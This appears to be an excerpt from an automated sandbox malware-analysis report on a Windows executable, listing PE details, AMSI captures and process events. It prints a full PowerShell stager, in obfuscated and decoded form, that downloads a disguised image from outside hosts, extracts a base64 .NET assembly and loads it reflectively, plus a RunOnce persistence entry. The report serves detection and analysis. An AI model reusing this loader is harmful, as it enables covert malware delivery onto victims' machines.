        Source: Binary string: ib.pdbS source: powershell.exe, 00000007.00000002.2202017383.00000218C3434000.00000004.00000020.00020000.00000000.sdmp
        Source: 00wVZ1NU5b.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: 00wVZ1NU5b.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: 00wVZ1NU5b.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: 00wVZ1NU5b.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: 00wVZ1NU5b.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        barindex
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetTy
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedB
        Suspicious powershell command line found
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.ihbddiI/selif/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@DJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.ihbddiI/selif/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: 00wVZ1NU5b.exeStatic PE information: 0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F3214 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7E74F3214
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34847913 push ebx; retf 7_2_00007FFD3484796A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD3484785D push ebx; retf 7_2_00007FFD3484796A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34911546 push ss; ret 7_2_00007FFD3491166B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34916109 push esp; ret 7_2_00007FFD3491612B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34915112 push ss; ret 7_2_00007FFD34915113
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD3491011A push ss; ret 7_2_00007FFD3491011B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34913CE2 push ss; ret 7_2_00007FFD34913CE3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34916CEC push esp; ret 7_2_00007FFD34916D03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD349168F2 push esp; ret 7_2_00007FFD349168F3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD349168F5 push ss; ret 7_2_00007FFD34916913
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD3491614A push ss; ret 7_2_00007FFD3491614B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34916D22 push ss; ret 7_2_00007FFD34916D23
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34912128 push esp; ret 7_2_00007FFD34912143
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD3491652A push ss; ret 7_2_00007FFD3491652B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34911082 push ss; ret 7_2_00007FFD34911083
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34913092 push ss; ret 7_2_00007FFD34913093
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34910062 push ss; ret 7_2_00007FFD34910063
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34910C62 push ss; ret 7_2_00007FFD34910C63
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD3491547A push ss; ret 7_2_00007FFD3491547B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD349124D2 push ss; ret 7_2_00007FFD349124D3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34914202 push ss; ret 7_2_00007FFD34914203
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34910613 push ss; ret 7_2_00007FFD3491061B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34916619 push esp; ret 7_2_00007FFD3491663B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34913258 push esp; ret 7_2_00007FFD3491325B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD3491725A push ss; ret 7_2_00007FFD3491725B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34912162 push ss; ret 7_2_00007FFD34912163
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34912965 push edx; ret 7_2_00007FFD3491296B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD3491296D push esp; ret 7_2_00007FFD34912B83
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD349101D2 push ss; ret 7_2_00007FFD349101D3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD34914DDA push ss; ret 7_2_00007FFD34914DDB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD349109A5 push ss; ret 7_2_00007FFD349109E3
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F15F4 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF7E74F15F4
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
